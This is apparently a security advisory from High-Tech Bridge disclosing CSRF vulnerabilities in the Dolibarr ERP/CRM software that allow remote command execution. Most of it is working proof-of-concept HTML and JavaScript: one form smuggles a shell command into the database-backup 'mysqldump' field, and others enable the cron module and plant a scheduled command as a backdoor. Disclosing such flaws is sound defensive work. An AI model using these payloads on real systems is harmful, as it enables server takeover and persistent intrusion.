Multiple RCEs via CSRF in Dolibarr

High-Tech Bridge Security Research Lab discovered multiple CSRF vulnerabilities in a popular ERP and CRM software Dolibarr. Discovered vulnerabilities may allow remote attacker to run arbitrary commands on vulnerable system via CSRF vector. Successful exploitation of the vulnerabilities can lead to full website and server compromise.

Cross-Site Request Forgery vulnerabilities exist in multiple scripts due to insufficient implementation of anti-CSRF mechanisms. The web application relies only on the HTTP Referer header to determine origin of HTTP requests, however it accepts requests with empty or absent HTTP Referer header. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate admin and execute arbitrary OS commands on vulnerable system.

The PoC code below exploits vulnerability in "/admin/tools/export.php" database backup script and creates "/ls.txt" file in webroot directory with execution result of "/bin/ls" command (directory listing of current directory):

<script>
url = 'http://dolibarr/admin/tools/export.php';
location = 'data:text/html,<html><meta http-equiv="refresh" content="0; url=data:text/html,<form id=f method=post action=\''+url+'\'><input type=\'hidden\' name=\'export_type\' value=\'server\'><input type=\'hidden\' name=\'what\' value=\'mysql\'><input type=\'hidden\' name=\'mysqldump\' value=\'ls>../../../../../../../../../../ls.txt||\'><input type=\'hidden\' name=\'disable_fk\' value=\'yes\'><input type=\'hidden\' name=\'sql_compat\' value=\'NONE\'><input type=\'hidden\' name=\'sql_structure\' value=\'structure\'><input type=\'hidden\' name=\'drop\' value=\'on\'><input type=\'hidden\' name=\'sql_data\' value=\'data\'><input type=\'hidden\' name=\'showcolumns\' value=\'yes\'><input type=\'hidden\' name=\'extended_ins\' value=\'yes\'><input type=\'hidden\' name=\'hexforbinary\' value=\'yes\'><input type=\'hidden\' name=\'nobin_disable_fk\' value=\'yes\'><input type=\'hidden\' name=\'nobin_drop\' value=\'on\'><input type=\'hidden\' name=\'filename_template\' value=\'12345.sql\'><input type=\'hidden\' name=\'compression\' value=\'bz\'><input type=\'submit\' value=\'Submit request\'></form><script>document.getElementById(\'f\').submit()</scri'+'pt> "></html>';
</script>

Another exploitation technique of the vulnerabilities allows backdoor injection using "cron" module. It is possible to use CSRF vulnerability in "/admin/modules.php" script to activate "cron" module and CSRF in "/cron/card.php" script to run scheduled malicious task on the system. The attackers can use this technique to secure their presence on the compromised system.

The following CSRF exploit below will activate "cron" module:

<img src="http://dolibarr/admin/modules.php?id=2300&module_position=500&action=se t&value=modCron&mode=common">

The next step would be to create a "cron" task using the following code:

<script>
url = 'http://dolibarr/cron/card.php';
location = 'data:text/html,<html><meta http-equiv="refresh" content="0; url=data:text/html,<form id=f method=post action=\''+url+'\'><input type=\'hidden\' name=\'action\' value=\'add\' /><input type=\'hidden\' name=\'label\' value=\'1\' /><input type=\'hidden\' name=\'jobtype\' value=\'command\' /><input type=\'hidden\' name=\'datestart\' value=\'06/08/2016\' /><input type=\'hidden\' name=\'datestartday\' value=\'08\' /><input type=\'hidden\' name=\'datestartmonth\' value=\'06\' /><input type=\'hidden\' name=\'datestartyear\' value=\'2016\' /><input type=\'hidden\' name=\'datestarthour\' value=\'00\' /><input type=\'hidden\' name=\'datestartmin\' value=\'00\' /><input type=\'hidden\' name=\'dateend\' value=\'\' /><input type=\'hidden\' name=\'dateendday\' value=\'\' /><input type=\'hidden\' name=\'dateendmonth\' value=\'\' /><input type=\'hidden\' name=\'dateendyear\' value=\'\' /><input type=\'hidden\' name=\'dateendhour\' value=\'-1\' /><input type=\'hidden\' name=\'dateendmin\' value=\'-1\' /><input type=\'hidden\' name=\'priority\' value=\'0\' /><input type=\'hidden\' name=\'nbfrequency\' value=\'1\' /><input type=\'hidden\' name=\'unitfrequency\' value=\'60\' /><input type=\'hidden\' name=\'module_name\' value=\'\' /><input type=\'hidden\' name=\'classesname\' value=\'\' /><input type=\'hidden\' name=\'objectname\' value=\'\' /><input type=\'hidden\' name=\'methodename\' value=\'\' /><input type=\'hidden\' name=\'params\' value=\'\' /><input type=\'hidden\' name=\'command\' value=\'ls > ../../../../../ls.txt\' /><input type=\'hidden\' name=\'note\' value=\'\' /><input type=\'hidden\' name=\'save\' value=\'Save\' /><input type=\'submit\' value=\'Submit request\' /></form><script>document.getElementById(\'f\').submit()</scri'+'pt>"></html >';
</script>

Our task will execute "/bin/ls" command and write its output onto "/ls.txt" file. We can use the following CSRF exploit to trigger execution of our "cron" task:

<img src="http://dolibarr/cron/card.php?action=activate&id=1">